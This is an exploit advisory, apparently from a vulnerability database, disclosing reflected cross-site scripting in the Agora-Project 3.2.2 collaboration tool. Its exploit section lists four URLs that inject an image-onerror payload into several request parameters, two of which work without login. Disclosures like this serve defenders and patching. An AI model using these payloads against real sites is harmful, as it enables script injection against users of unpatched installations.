Agora-Project 3.2.2 Cross Site Scripting

Credit: Multiple
Risk: Low
Local: No
Remote: No

# Exploit Title: XSS Vulnerability on Agora-Project 3.2.2 # Google Dork: no # Date: 23-02-2017 # Exploit Author: @rungga_reksya, @AdyWikradinata, @yokoacc # Vendor Homepage: # Software Link: # Software Link Mirror: # Version: 3.2.2 # Tested on: Windows Server 2012 Datacenter Evaluation # CVE : no I. Background: Agora-Project is a workspace dedicated to collaboration and information exchange. Complete and intuitive, this tool is accessible via a simple web browser. Ideal for teamwork, it facilitate the exchange and creativity of a group around a common project, releasing the constraints of time and space. Agora-Project is ideal for small structures such as associations, schools or SME, but is also suitable for larger organizations by allowing the establishment of subspaces. II. Description Vulnerability on CMS Agora is XSS III. Exploit No Login: http://IP_Address/folder_agora_project_3.2.2/index.php?disconnect=1&msgNotif[]="><img src=x onerror=prompt(/XSS/)> http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=misc&action="><img src=x onerror=prompt(/XSS/)>&editObjId="><img src=x onerror=prompt(/XSS/)> Needed login: http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=object&action="><img src=x onerror=prompt(/XSS/)>_id="><img src=x onerror=prompt(/XSS/)> http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=file&targetObjId=fileFolder-2&targetObjIdChild="><img src=x onerror=prompt(/XSS/)> IV. Thanks to - Alloh SWT - (Chris Russell) - MyBoboboy - @AdyWikradinata, @yokoacc - Komunitas IT Auditor & IT Security Kaskus -

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top